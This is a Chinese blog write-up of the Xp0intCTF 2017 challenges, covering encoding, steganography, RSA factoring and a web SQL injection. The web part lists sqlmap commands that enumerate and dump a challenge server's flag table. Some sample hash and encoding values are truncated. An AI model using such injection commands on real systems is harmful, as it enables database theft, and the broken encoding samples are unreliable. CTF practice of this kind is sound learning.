首页 > 编程札记 > 编程

Xp0intCTF 2017 writeup

阅读：评论：0

记录第一场ctf

SGA

看起来好像是一种神秘的文字…（得到的内容加flag{}提交，且全部小写）

hint:Encyclopedia is your good friend！

• 去掉后缀，得到zip，解压得到一串文字

• hint提示,通过wiki搜索SGA，且提示是一种神秘文字

• 一一对应，得到flag

弗拉戈在哪里？

小明整蛊舍友，将他舍友的兰博基尼钥匙锁在zip里面了，你能帮他找回钥匙吗？

• 解压，以1.zip着手（出题人调皮）

• winhex打开1.zip

• base64解码得到flag

• 补充-常见码制
o Base 64编码：
dGVybWluYXRvcg==
oMD5：9adb6a0e0003fe1293737c39acc824
oSHA-1：ebabb7d2d2120312c0e7c9
o URL编码： %05 %37 %08
o HEX编码：74 65 72 6d 69 6e 61 74 6f 72
o JsFuck：[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[]
o Html编码：Τ&#917
o Unicode编码：r《》&#10

弗拉戈在哪里2?

小明又回来整蛊舍友了，不过这次钥匙他直接归还给舍友了，他说很喜欢这首歌，你知道小明说的是哪一首吗？

• 用winhex打开

犯人留下了信息

密室中有三个人，不是你，也不是我，好吧，是他们之中留下了信息而你却看不见，你快要被污死了，怎么办，选择自救吗，擦亮眼睛，答案就在眼前。

Hint1: 盲水印

解题参考链接：

一开始找的是双图隐写，在查资料的时候发现了很多新思路，顺便贴一下链接

Xp0int大家庭

Xp0int日常，跑一下我们在干什么？

题目地址：
119.29.191.200/ctf/7fcdb7ba6de74b6e007efe1079540e0228817d26/

• 好多颜文字，复制粘贴后，f12打开开发者工具控制台，得到flag

解题参考链接：

好像说太多了

• 打开文件发现是一串乱序英文字母，且有标点，猜测是一段话打乱，替代解密。（话痨，鉴定完毕）

解题参考链接:
/

EasyRSA

• 模数分解
o 如果n比较小，那么可以通过工具进行直接n分解，从而得到私钥。如果n的大小小于256bit，那么我们通过本地工具即可爆破成功。例如采用windows平台的RSATool2v17，可以在几分钟内完成256bit的n的分解。
o 如果n在768bit或者更高，可以尝试使用一些在线的n分解网站，这些网站会存储一些已经分解成功的n，比如：

• 知道e，p，q的情况下，可以解出d：

• RSA解密，得到flag

• 解题参考链接：
.html

一个简陋的博客 Web

前端的X同学做一半跑路了，反正功能实现了，能上传文章就行（逃。。。

题目地址：
119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/

• sql注入，尝试后发现未过滤单引号，找到注入点

• 使用sqlmap，发现database是test1

• 补充-sqlmap基本命令
o sqlmap -u “119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” –current-db
o qlmap -u “119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 –tables
o sqlmap -u “119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 -T flag –columns
o sqlmap -u “119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” -D test1 -T flag -C flag –dump